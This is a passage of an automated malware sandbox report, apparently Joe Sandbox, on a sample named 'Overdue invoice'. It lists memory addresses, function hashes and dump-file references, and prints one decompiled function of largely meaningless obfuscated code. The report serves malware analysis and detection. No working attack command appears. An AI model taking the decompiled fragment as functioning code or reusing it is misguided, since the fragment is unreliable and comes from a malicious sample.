                                                                          0x00524fd4
                                                                          0x00524fd4
                                                                          0x00524fd8
                                                                          0x00524fd9
                                                                          0x00524fdb
                                                                          0x00524fdc
                                                                          0x00524fdc
                                                                          0x00524fdd
                                                                          0x00524fe0
                                                                          0x00524fe2
                                                                          0x00524fe4
                                                                          0x00524fe5
                                                                          0x00524fe8
                                                                          0x00524fec
                                                                          0x00524fee
                                                                          0x00524ff1
                                                                          0x00524ff3
                                                                          0x00524ff5
                                                                          0x00524ff7
                                                                          0x00524ff9
                                                                          0x00524ffc
                                                                          0x00524ffe
                                                                          0x00525000
                                                                          0x00525002
                                                                          0x00525004
                                                                          0x00525005
                                                                          0x00525007
                                                                          0x00525009
                                                                          0x0052500b
                                                                          0x0052500d
                                                                          0x00000000
                                                                          0x0052500d
                                                                          0x00524fd2
                                                                          0x00524f88
                                                                          0x00524f88
                                                                          0x00524f8c
                                                                          0x00524f8d
                                                                          0x00524f8f
                                                                          0x00000000
                                                                          0x00524f8f
                                                                          0x00524f86
                                                                          0x00524f80
                                                                          0x00525077
                                                                          0x00525079
                                                                          0x0052507b
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0052507d
                                                                          0x0052507f
                                                                          0x00525081
                                                                          0x00525083
                                                                          0x00525084
                                                                          0x00525086
                                                                          0x00525088
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0052508a
                                                                          0x0052508c
                                                                          0x0052508e
                                                                          0x00525091
                                                                          0x00525093
                                                                          0x00525095
                                                                          0x00525098
                                                                          0x0052509a
                                                                          0x0052509b
                                                                          0x0052509d
                                                                          0x0052509f
                                                                          0x005250a1
                                                                          0x005250a2
                                                                          0x005250a4
                                                                          0x005250a6
                                                                          0x005250a8
                                                                          0x005250ee
                                                                          0x005250f1
                                                                          0x005250aa
                                                                          0x005250aa
                                                                          0x005250ac
                                                                          0x005250ae
                                                                          0x005250b0
                                                                          0x005250b2
                                                                          0x005250b4
                                                                          0x005250b7
                                                                          0x005250b9
                                                                          0x005250ba
                                                                          0x005250bc
                                                                          0x005250be
                                                                          0x005250c0
                                                                          0x005250c1
                                                                          0x005250c3
                                                                          0x005250c5
                                                                          0x005250c7
                                                                          0x005250c9
                                                                          0x005250cb
                                                                          0x005250cd
                                                                          0x005250cf
                                                                          0x005250d1
                                                                          0x005250d3
                                                                          0x005250d5
                                                                          0x005250d8
                                                                          0x005250dc
                                                                          0x005250de
                                                                          0x005250e0
                                                                          0x005250e2
                                                                          0x005250e5
                                                                          0x005250e7
                                                                          0x005250e8
                                                                          0x005250ea
                                                                          0x005250ec
                                                                          0x00000000
                                                                          0x005250ec
                                                                          0x005250ae
                                                                          0x005250f5
                                                                          0x005250f7
                                                                          0x005250fb
                                                                          0x005250fd
                                                                          0x005250fe
                                                                          0x00525100
                                                                          0x00525101
                                                                          0x00525103
                                                                          0x00525105
                                                                          0x00525107
                                                                          0x00525109
                                                                          0x0052510b
                                                                          0x0052510d
                                                                          0x0052510f
                                                                          0x00525111
                                                                          0x00525113
                                                                          0x00525115
                                                                          0x00525117
                                                                          0x00525119
                                                                          0x00525161
                                                                          0x00525161
                                                                          0x00525163
                                                                          0x00525165
                                                                          0x00525167
                                                                          0x00000000
                                                                          0x00525169
                                                                          0x00525169
                                                                          0x0052516b
                                                                          0x0052516d
                                                                          0x0052516e
                                                                          0x00525175
                                                                          0x00525176
                                                                          0x00000000
                                                                          0x00525176
                                                                          0x0052511b
                                                                          0x0052511b
                                                                          0x0052511f
                                                                          0x00525120
                                                                          0x00525122
                                                                          0x00525129
                                                                          0x0052512b
                                                                          0x0052512d
                                                                          0x0052512f
                                                                          0x00525177
                                                                          0x00525177
                                                                          0x00525179
                                                                          0x0052517b
                                                                          0x0052517d
                                                                          0x0052517f
                                                                          0x00525181
                                                                          0x00525183
                                                                          0x00525185
                                                                          0x00525187
                                                                          0x00525189
                                                                          0x0052518b
                                                                          0x0052518f
                                                                          0x00525192
                                                                          0x00525193
                                                                          0x00525195
                                                                          0x00000000
                                                                          0x00525197
                                                                          0x00525197
                                                                          0x0052519c
                                                                          0x005251a2
                                                                          0x005251a3
                                                                          0x005251a4
                                                                          0x005251a5
                                                                          0x005251a7
                                                                          0x005251aa
                                                                          0x005251ad
                                                                          0x005251af
                                                                          0x005251af
                                                                          0x005251b1
                                                                          0x005251b3
                                                                          0x005251b6
                                                                          0x005251b8
                                                                          0x005251b9
                                                                          0x005251bb
                                                                          0x005251bf
                                                                          0x005251c4
                                                                          0x005251c6
                                                                          0x005251c7
                                                                          0x005251c9
                                                                          0x005251cb
                                                                          0x005251cd
                                                                          0x005251cf
                                                                          0x005251cf
                                                                          0x00525195
                                                                          0x00525131
                                                                          0x00525131
                                                                          0x00525133
                                                                          0x00525135
                                                                          0x00525136
                                                                          0x0052513d
                                                                          0x00525140
                                                                          0x00525142
                                                                          0x00525144
                                                                          0x00525146
                                                                          0x00525148
                                                                          0x0052514a
                                                                          0x0052514c
                                                                          0x0052514e
                                                                          0x00525150
                                                                          0x00525153
                                                                          0x00525155
                                                                          0x00525156
                                                                          0x00525158
                                                                          0x0052515a
                                                                          0x0052515c
                                                                          0x00000000
                                                                          0x0052515c
                                                                          0x0052512f
                                                                          0x005251d1
                                                                          0x005251d3
                                                                          0x005251d5
                                                                          0x005251d6
                                                                          0x005251d7
                                                                          0x005251d8
                                                                          0x005251da
                                                                          0x005251db
                                                                          0x005251df

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.297583913.0000000000522000.00000002.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                                                          • Associated: 00000000.00000002.297565297.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.297763203.00000000005BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.297784487.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_520000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 893d992448fcceffcf45ba799183bbad3250e7a40c7c0540991a93a8a74b845a
                                                                          • Instruction ID: 1464a4e6071fc33a7806a75dab81a627f2e8d0e09aa04e230bd7e174bc915fd1
                                                                          • Opcode Fuzzy Hash: 893d992448fcceffcf45ba799183bbad3250e7a40c7c0540991a93a8a74b845a
                                                                          • Instruction Fuzzy Hash: BA22C16244E3D15FCB135B78ADB51E17FB19E6721871E09CBD8C0CF0A3E11829AAD762
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00C2E2E0 Relevance: .3, Instructions: 315COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.298223387.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_c20000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5d523307edf7e2b08c8d7d0424ec15291ca5898beb6ed029c08196722000c4cb
                                                                          • Instruction ID: 62778486181e09287a8a092cb9dc7a039fc33f50e2fc6036df8abe8697f390fa
                                                                          • Opcode Fuzzy Hash: 5d523307edf7e2b08c8d7d0424ec15291ca5898beb6ed029c08196722000c4cb
                                                                          • Instruction Fuzzy Hash: 2A12A3F1611F468BE710CF65EC983AE3BA1B745328F924308D2612BAF1D7B8154AEF54
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00C2BA74 Relevance: .3, Instructions: 265COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.298223387.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_c20000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 07bb0d4271d46584a6d4ec1f4e827277da09db59b359a7d9381ab3dc9a07e265
                                                                          • Instruction ID: f9d5ada9b93c66768f99fde23df27b77172ddaa4900b4eb1c0fad609d4ca5e4c
                                                                          • Opcode Fuzzy Hash: 07bb0d4271d46584a6d4ec1f4e827277da09db59b359a7d9381ab3dc9a07e265
                                                                          • Instruction Fuzzy Hash: 4EA18C32E00629CFCF15DFB5D8445DEBBB2FF95300B15856AE816AB225EB30AD46CB50
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00C2E2D0 Relevance: .2, Instructions: 227COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.298223387.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_c20000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: dd52248c734efa5303034440764576cedfd50de79e18906ad85923d3cba4f5e1
                                                                          • Instruction ID: 09370f8e638b3831f15dcf5d2a608944d0d9f80c824888a43408c0ffd49baf07
                                                                          • Opcode Fuzzy Hash: dd52248c734efa5303034440764576cedfd50de79e18906ad85923d3cba4f5e1
                                                                          • Instruction Fuzzy Hash: B5C138B1A11B468BD710DF65EC883AF3B61BB85328F524318D2612B6F1D7B8148ADF94
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0726CD88 Relevance: .2, Instructions: 208COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.304428797.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7260000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d619d928e6d4da07124e1789f83cf2dc2cc5d822ce836ab7eece59e59e019f21
                                                                          • Instruction ID: cad60bbc96cf0a7cfb72310716a0df7699774093e6a0459db9dc90df10c8d724
                                                                          • Opcode Fuzzy Hash: d619d928e6d4da07124e1789f83cf2dc2cc5d822ce836ab7eece59e59e019f21
                                                                          • Instruction Fuzzy Hash: D0916CB4E14519CBCB14DFA9C9846AEFBF6FF89304F24C16AD418A7215D730AA81CF60
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 07268658 Relevance: .2, Instructions: 173COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.304428797.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7260000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8b175b31b43c7c9330b0ed8ed3dfba7354522dda1d5971f313ef130afd89c965
                                                                          • Instruction ID: b2c6eaba26d3068853c3f446f79a6592d326dc56fdcf6793310e250b70fc2bbe
                                                                          • Opcode Fuzzy Hash: 8b175b31b43c7c9330b0ed8ed3dfba7354522dda1d5971f313ef130afd89c965
                                                                          • Instruction Fuzzy Hash: 4B7104B4E25609CFCB08CFA9C9849DEFBF2FB89210F24942AD415B7314D7709A818F64
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02731C88 Relevance: .2, Instructions: 171COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.298516020.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_2730000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1c857a476da1763abfc054ea5d5003be1425707e1b9e56746a7f67f04ded0400
                                                                          • Instruction ID: bad299fca8fa056933c6d43c810d6654432dcd3f39b3269e75eca4549688fe35
                                                                          • Opcode Fuzzy Hash: 1c857a476da1763abfc054ea5d5003be1425707e1b9e56746a7f67f04ded0400
                                                                          • Instruction Fuzzy Hash: 927137B0E5122A8BDB64DF66C9447A9BBB2FF89300F10C5EAD40DA7255EB305AC5CF40
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 07264FC8 Relevance: .2, Instructions: 171COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.304428797.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7260000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 39d11d33f7394336280ba2d6e9d018ff44446fed30004a418610880c496a2e3a
                                                                          • Instruction ID: 7f73bf01ea1c0e898d03bb662ec07340bbbfc98ecd588df7053e1a1ca39cae1a
                                                                          • Opcode Fuzzy Hash: 39d11d33f7394336280ba2d6e9d018ff44446fed30004a418610880c496a2e3a
                                                                          • Instruction Fuzzy Hash: 757116B4E2120ADFCB04DF9AD5849AEFBB6FB89310F10942AD515A7310E3749A91CF91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 07264FB9 Relevance: .2, Instructions: 170COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.304428797.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7260000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 28ae568bbfaa87a834854a5115d731d54efbfd5decd4461aa8a30b07b7a67043
                                                                          • Instruction ID: ff271cdd7c3e221c833241b34c094ae6f3059ba242dd5a4ec45994b9dd47bac9
                                                                          • Opcode Fuzzy Hash: 28ae568bbfaa87a834854a5115d731d54efbfd5decd4461aa8a30b07b7a67043
                                                                          • Instruction Fuzzy Hash: DD6138B4E2120ADFCB04CF9AD484AEEFBB1FB89310F109426D515A7310E3749A91CF91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 07268648 Relevance: .2, Instructions: 169COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.304428797.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7260000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e7175b83a71ad1a8c78335cd45d97b73de89f0277c51a7f1088f41339670ef8e
                                                                          • Instruction ID: a01372739c4b66137a0fb61585f9e62cf071e684c19d60b6d06a6fba1921c4fb
                                                                          • Opcode Fuzzy Hash: e7175b83a71ad1a8c78335cd45d97b73de89f0277c51a7f1088f41339670ef8e
                                                                          • Instruction Fuzzy Hash: 2D71F4B4E25609CFCB04CFA9C9849DEFBF2FB89210F28942AD415B7354D7749A818F64
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02731730 Relevance: .2, Instructions: 161COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.298516020.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_2730000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ccbcb686004657e8204f1569474d004ec2d7fb9fb191fd4cefbca47e58238af1
                                                                          • Instruction ID: 49a8a86e540267140a450a788d4731d98db5889580c82e1198552b3f437ee3c9
                                                                          • Opcode Fuzzy Hash: ccbcb686004657e8204f1569474d004ec2d7fb9fb191fd4cefbca47e58238af1
                                                                          • Instruction Fuzzy Hash: A66126B4E1520ADFDB05CFA5D4815AEBBB2FF89300F54942AD419B7344EB345A42CF91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02731740 Relevance: .2, Instructions: 159COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.298516020.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_2730000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 24778b694e1cf136114651662a2d29e686298e1c987b43a4899cbffc84ed1ba8
                                                                          • Instruction ID: edcf1301591a11871b328610b3d200094e76c05b5d17b6ee0eec680415aeaad3
                                                                          • Opcode Fuzzy Hash: 24778b694e1cf136114651662a2d29e686298e1c987b43a4899cbffc84ed1ba8
                                                                          • Instruction Fuzzy Hash: 2F5126B4E1520ADFDB04CFAAD4805AEBBB2FF89300F54942AD419B7344EB345A42CF91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02731C83 Relevance: .2, Instructions: 152COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.298516020.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_2730000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 084a602cc9d0303788ec2b9cecdd7bc8cad797bf0b00d37d6d7a6edfe043ad27
                                                                          • Instruction ID: 9ce9a745591577378d45166403c4ff398edcb9ae6c9efff78bcbac48dd63815b
                                                                          • Opcode Fuzzy Hash: 084a602cc9d0303788ec2b9cecdd7bc8cad797bf0b00d37d6d7a6edfe043ad27
                                                                          • Instruction Fuzzy Hash: 126139B0E5162A8BDB68DF65C944799BBF2FF88300F1085EAD40DA7255EB705AC5CF40
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 005259ED Relevance: .1, Instructions: 139COMMONCrypto
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 75%
                                                                          			E005259ED(intOrPtr* __eax, signed int __ebx, void* __ecx, intOrPtr* __edx, void* __edi, signed int* __esi) {
				signed char _t13;
				signed int _t14;
				intOrPtr* _t16;
				signed char _t17;
				signed char _t18;
				intOrPtr* _t19;
				signed char _t20;
				signed char _t21;
				signed char _t22;
				signed char _t26;
				signed char _t29;
				intOrPtr* _t31;
				signed int _t32;
				signed char _t35;
				signed int _t36;
				intOrPtr* _t37;
				signed char _t40;
				signed char _t41;
				signed char _t43;
				signed int* _t50;
				signed int* _t51;
				signed int _t53;
				signed int* _t54;
				void* _t58;

				_t54 = __esi;
				_t36 = __ebx;
				_t53 = __edi + __esi;
				asm("adc eax, 0x1b000012");
				_t13 = __eax -  *__eax;
				 *_t13 =  *_t13 + _t13;
				_push(ds);
				_t40 = __ecx +  *_t13;
				_t14 = _t13 &  *_t13;
				 *__edx =  *__edx + _t40;
				_t50 = __edx -  *__ebx;
				 *_t50 =  *_t50 ^ _t14;
				 *__ebx =  *__ebx + _t14;
				 *_t14 =  *_t14 + _t14;
				 *_t14 =  *_t14 + _t50;
				 *_t14 =  *_t14 + _t14;
				asm("adc [esi-0xa], edi");
				 *_t14 =  *_t14 + _t14;
				_t41 = _t40 |  *(_t58 +  &(_t50[0x506c000]));
				 *_t41 =  *_t41 + 1;
				_t16 = (_t14 |  *_t53) - 0xa;
				 *((intOrPtr*)(_t16 + _t16)) =  *((intOrPtr*)(_t16 + _t16)) - _t41;
				do {
					 *_t16 =  *_t16 + _t16;
					_t16 = _t16 -  *((intOrPtr*)(_t16 + 0xa0000f6));
				} while (_t16 <= 0);
				 *_t16 =  *_t16 + _t16;
				_push(es);
				_t17 = _t16 -  *_t16;
				_push(ds);
				_t43 = (_t41 |  *_t50) +  *_t17;
				_t18 = _t17 &  *_t17;
				 *_t50 =  *_t50 + _t43;
				_t51 = _t50 -  *__ebx;
				 *__ebx =  *__ebx ^ _t18;
				 *_t43 =  *_t43 + _t43;
				 *_t18 =  *_t18 + _t18;
				 *_t43 = _t51 +  *_t43;
				 *_t18 =  *_t18 + _t18;
				asm("adc [edx], eax");
				if( *_t18 != 0) {
					L6:
					_t43 = _t43 -  *_t51;
					es = es;
					_t36 = _t36 ^ _t53;
					_t19 = _t18 -  *_t18;
					 *_t19 =  *_t19 + _t19;
					asm("adc esi, [eax]");
					_t20 = _t19 +  *_t19;
					asm("sbb [eax], al");
					 *_t20 =  *_t20 + _t20;
					_t21 = _t20 ^  *_t20;
					 *_t43 = _t51 +  *_t43;
					goto L7;
				} else {
					 *_t18 =  *_t18 + _t18;
					_push(es);
					_t29 = (_t18 + 0x0000000a |  *_t53) ^ 0x00000000;
					 *_t43 =  *_t43 + _t29;
					_t21 = _t29 | 0x00000002;
					if(_t21 < 0) {
						L7:
						_t37 = _t36 +  *((intOrPtr*)(_t36 + 0x57));
						 *_t21 =  *_t21 + _t21;
						_t22 = _t21 + 0xa;
						do {
							_push(es);
							_t22 = (_t22 |  *_t54) - 0xd +  *_t37;
						} while (_t22 >= 0);
						 *_t22 =  *_t22 + _t22;
						 *_t22 =  *_t22 + _t22;
						_pop(ss);
						asm("outsd");
						 *_t22 = 0x28020600;
						asm("rol dword [eax], 0x0");
						_t43 = _t43 |  *(_t53 - 8) |  *_t51 |  *_t51;
						 *_t37 =  *_t37 + _t51;
						 *_t43 =  *_t43 ^ _t22;
						 *((intOrPtr*)(_t22 + _t22)) =  *((intOrPtr*)(_t22 + _t22)) + _t43;
						 *_t22 =  *_t22 + _t22;
						_pop(es);
						 *_t22 =  *_t22 + _t22;
						asm("adc [ebx], eax");
						_t26 = (_t22 |  *_t54) - 6;
					} else {
						 *_t21 =  *_t21 + _t21;
						_pop(es);
						 *0xa2b0000 =  *0xa2b0000 - _t43;
						es = es;
						_t31 = _t21 + 8 -  *((intOrPtr*)(_t21 + 8));
						 *_t31 =  *_t31 + _t31;
						asm("adc esi, [eax]");
						_t32 = _t31 +  *_t31;
						 *_t32 =  *_t32 - _t32;
						 *_t32 =  *_t32 + _t32;
						 *_t32 =  *_t32 ^ _t32;
						 *_t43 = _t51 +  *_t43;
						_t37 = (__ebx ^ _t53) +  *((intOrPtr*)((__ebx ^ _t53) + 0x57));
						 *_t32 =  *_t32 + _t32;
						_push(es);
						_t54 = 0x740a0000;
						_t35 = (_t32 + 0x0000000a |  *_t53) ^ 0x00000000;
						 *_t43 =  *_t43 + _t35;
						_t26 = _t35 | 0x00000002;
						if(_t26 >= 0) {
							 *_t26 =  *_t26 + _t26;
							_t18 = _t26 + 8;
							_pop(es);
							 *0xa2b0000 =  *0xa2b0000 - _t43;
							goto L6;
						}
					}
				}
				_push(es);
				 *_t26 =  *_t26 + _t26;
				_push(es);
				 *_t51 =  *_t51 ^ _t26;
				 *((intOrPtr*)(_t43 +  *((intOrPtr*)(_t53 - 0x3e)) -  *_t37)) =  *((intOrPtr*)(_t43 +  *((intOrPtr*)(_t53 - 0x3e)) -  *_t37)) + _t51;
				 *_t26 =  *_t26 + _t26;
				 *_t26 =  *_t26 + _t26;
				 *_t26 =  *_t26 + _t26;
				 *_t51 =  *_t51 + _t26;
				_push(ss);
				asm("outsd");
				 *_t26 = 0x7de0600;
				return _t26;
			}



























                                                                          0x005259ed
                                                                          0x005259ed
                                                                          0x005259ed
                                                                          0x005259ef
                                                                          0x005259f4
                                                                          0x005259f6
                                                                          0x005259f8
                                                                          0x005259f9
                                                                          0x005259fb
                                                                          0x005259fd
                                                                          0x005259ff
                                                                          0x00525a01
                                                                          0x00525a03
                                                                          0x00525a05
                                                                          0x00525a07
                                                                          0x00525a09
                                                                          0x00525a0b
                                                                          0x00525a0e
                                                                          0x00525a10
                                                                          0x00525a17
                                                                          0x00525a1b
                                                                          0x00525a1d
                                                                          0x00525a1f
                                                                          0x00525a1f
                                                                          0x00525a21
                                                                          0x00525a21
                                                                          0x00525a29
                                                                          0x00525a2d
                                                                          0x00525a2e
                                                                          0x00525a30
                                                                          0x00525a31
                                                                          0x00525a33
                                                                          0x00525a35
                                                                          0x00525a37
                                                                          0x00525a39
                                                                          0x00525a3b
                                                                          0x00525a3d
                                                                          0x00525a3f
                                                                          0x00525a41
                                                                          0x00525a43
                                                                          0x00525a45
                                                                          0x00525a9e
                                                                          0x00525a9e
                                                                          0x00525aa1
                                                                          0x00525aa2
                                                                          0x00525aa4
                                                                          0x00525aa6
                                                                          0x00525aa8
                                                                          0x00525aaa
                                                                          0x00525aac
                                                                          0x00525aae
                                                                          0x00525ab0
                                                                          0x00525ab2
                                                                          0x00000000
                                                                          0x00525a47
                                                                          0x00525a47
                                                                          0x00525a4b
                                                                          0x00525a55
                                                                          0x00525a57
                                                                          0x00525a59
                                                                          0x00525a5b
                                                                          0x00525ab4
                                                                          0x00525ab4
                                                                          0x00525ab7
                                                                          0x00525ab9
                                                                          0x00525aba
                                                                          0x00525abe
                                                                          0x00525abf
                                                                          0x00525abf
                                                                          0x00525ac3
                                                                          0x00525ac8
                                                                          0x00525ace
                                                                          0x00525acf
                                                                          0x00525ad0
                                                                          0x00525ad6
                                                                          0x00525ad9
                                                                          0x00525adb
                                                                          0x00525add
                                                                          0x00525adf
                                                                          0x00525ae2
                                                                          0x00525ae4
                                                                          0x00525ae5
                                                                          0x00525ae7
                                                                          0x00525aeb
                                                                          0x00525a5d
                                                                          0x00525a5d
                                                                          0x00525a61
                                                                          0x00525a62
                                                                          0x00525a69
                                                                          0x00525a6c
                                                                          0x00525a6e
                                                                          0x00525a70
                                                                          0x00525a72
                                                                          0x00525a74
                                                                          0x00525a76
                                                                          0x00525a78
                                                                          0x00525a7a
                                                                          0x00525a7c
                                                                          0x00525a7f
                                                                          0x00525a83
                                                                          0x00525a88
                                                                          0x00525a8d
                                                                          0x00525a8f
                                                                          0x00525a91
                                                                          0x00525a93
                                                                          0x00525a95
                                                                          0x00525a97
                                                                          0x00525a99
                                                                          0x00525a9a
                                                                          0x00000000
                                                                          0x00525a9a
                                                                          0x00525a93
                                                                          0x00525a5b
                                                                          0x00525aec
                                                                          0x00525af0
                                                                          0x00525af2
                                                                          0x00525af5
                                                                          0x00525af7
                                                                          0x00525af9
                                                                          0x00525afb
                                                                          0x00525afd
                                                                          0x00525aff
                                                                          0x00525b01
                                                                          0x00525b02
                                                                          0x00525b03
                                                                          0x00525b0b

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.297583913.0000000000522000.00000002.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                                                          • Associated: 00000000.00000002.297565297.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.297763203.00000000005BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.297784487.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_520000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ec98a38b7c09de2341ab4310998a6920c41741008efb1729c61f2e812521ff9f
                                                                          • Instruction ID: be4cc43dd2aa66ccc233630ad3d5c48c582bacf4f34c1e8c5ba43e5dab7e9c41
                                                                          • Opcode Fuzzy Hash: ec98a38b7c09de2341ab4310998a6920c41741008efb1729c61f2e812521ff9f
                                                                          • Instruction Fuzzy Hash: AD51012140E7D15FCB134BB498B96D27FB1AF5B204B5E08C7C4C1CF0A3E529192AD722
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02731058 Relevance: .1, Instructions: 120COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.298516020.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_2730000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8dec995209762f9b7b926fcb3ab93b1b3a9c072c11602cad3ea83d591eaf2e86
                                                                          • Instruction ID: bd0378743c26a1df3ee77daee1645a9d71e18ee429b75690641d53bac3c67835
                                                                          • Opcode Fuzzy Hash: 8dec995209762f9b7b926fcb3ab93b1b3a9c072c11602cad3ea83d591eaf2e86
                                                                          • Instruction Fuzzy Hash: 8E416671E05249EFCB04CFE6D9406AEBBB6EB89300F10D82AD419BB264D7785A00CF54
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02731048 Relevance: .1, Instructions: 120COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.298516020.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
